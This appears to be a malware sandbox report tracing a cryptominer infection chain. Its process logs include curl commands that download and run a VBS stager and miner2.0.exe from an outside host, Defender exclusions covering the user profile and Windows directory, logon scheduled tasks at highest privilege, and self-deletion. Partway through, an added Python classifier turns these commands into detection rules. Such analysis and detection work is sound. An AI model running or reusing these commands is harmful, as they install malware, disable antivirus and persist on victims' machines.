                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript conf.vbs
                        Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\services64.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit (2 identical entries)
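The process-creation entries above carry the three behaviours a detection engineer would key on: Add-MpPreference exclusions that cover the whole user profile and the Windows directory (Add-MpPreference only succeeds from an elevated process, so a successful exclusion also tells you the dropper already had administrator rights), a schtasks task triggered at logon with /rl highest pointing at a binary dropped into System32, and a choice.exe timeout used as a sleep before the stager deletes itself. The block below is an added example, not part of the Joe Sandbox report: a small Python classifier that runs these three rules over constructed process-creation records built from the command lines in this report. The Sysmon-style field names (Image, CommandLine), the rule names and the list of "broad" exclusion roots are my own assumptions.

```python
"""Classify Windows process-creation command lines into the behaviours listed
in the report above. Added example; not part of the Joe Sandbox output."""
import re
from typing import Dict, List

# Constructed sample records in the shape of Sysmon Event ID 1 (process creation).
# Command lines are copied from the report above; the last record is a benign control.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' "
                    "& powershell -Command Add-MpPreference -ExclusionPath '%AppData%' "
                    "& powershell -Command Add-MpPreference -ExclusionPath '%Temp%' "
                    "& powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /create /f /sc onlogon /rl highest /tn \"services64\" "
                    "/tr '\"C:\\Windows\\system32\\services64.exe\"'"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /C choice /C Y /N /D Y /T 3 "
                    "& Del \"C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command Get-MpPreference"},
]

# Value of any -ExclusionPath/-ExclusionProcess/-ExclusionExtension argument,
# whether single-quoted, double-quoted or bare.
EXCLUSION_ARG = re.compile(
    r"-Exclusion(?:Path|Process|Extension)\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))",
    re.IGNORECASE,
)
# Exclusion roots that switch Defender off for most of the file system (assumed list):
# profile/temp/system environment variables, a drive root, C:\Windows,
# or a user profile and its AppData subtrees.
BROAD_EXCLUSION = re.compile(
    r"^(?:%(?:userprofile|appdata|localappdata|temp|tmp|systemroot|windir|programdata)%"
    r"|[a-z]:(?:\\(?:windows|users(?:\\[^\\]+(?:\\appdata(?:\\(?:local|roaming)(?:\\temp)?)?)?)?))?)\\?$",
    re.IGNORECASE,
)
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.IGNORECASE)
SCHTASKS_OPT = re.compile(r"/(sc|rl|tn|tr)\b\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.IGNORECASE)
# "choice ... /T <n> & del <file>": a sleep built from choice.exe followed by deletion.
SELF_DELETE = re.compile(r"\bchoice\b[^&]*?/T\s+(\d+)[^&]*&\s*del\b", re.IGNORECASE)


def extract_exclusions(cmdline: str) -> List[str]:
    """Return every exclusion value added by Add-MpPreference in the command line."""
    return [a or b or c for a, b, c in EXCLUSION_ARG.findall(cmdline)]


def parse_schtasks(cmdline: str) -> Dict[str, str]:
    """Return the /sc, /rl, /tn and /tr options of a schtasks command line, unquoted."""
    opts: Dict[str, str] = {}
    for m in SCHTASKS_OPT.finditer(cmdline):
        opts[m.group(1).lower()] = (m.group(2) or m.group(3) or m.group(4) or "").strip('"')
    return opts


def classify(cmdline: str) -> List[str]:
    """Return the rule names that fire on one command line (empty list if none)."""
    findings: List[str] = []
    if re.search(r"\badd-mppreference\b", cmdline, re.IGNORECASE):
        findings.append("defender_exclusion_added")
        if any(BROAD_EXCLUSION.match(p) for p in extract_exclusions(cmdline)):
            findings.append("defender_exclusion_broad")
    if SCHTASKS_CREATE.search(cmdline):
        opts = parse_schtasks(cmdline)
        if opts.get("sc", "").lower() in ("onlogon", "onstart") and opts.get("rl", "").lower() == "highest":
            findings.append("schtasks_logon_persistence_highest")
    if SELF_DELETE.search(cmdline):
        findings.append("delayed_self_delete")
    return findings


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over process-creation records and keep only the hits."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        rules = classify(ev["CommandLine"])
        if rules:
            hits.append({"Image": ev["Image"], "Rules": rules, "CommandLine": ev["CommandLine"]})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["Image"], "->", ", ".join(hit["Rules"]))
```

The rules are deliberately keyed on the arguments rather than on process names, because the same chain appears here under cmd.exe, powershell.exe and schtasks.exe parents; on a live host the equivalent checks are Get-MpPreference (ExclusionPath) and Get-ScheduledTask for a task named services64.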
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Code function: 7_2_00401550 AllocateAndInitializeSid, CheckTokenMembership, FreeSid (7_2_00401550)
Source: axplong.exe, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C3D312 cpuid (6_2_00C3D312)
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (70 identical entries)
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (54 identical entries)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe VolumeInformation (2 identical entries)
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\miner2.0.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 identical entries)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
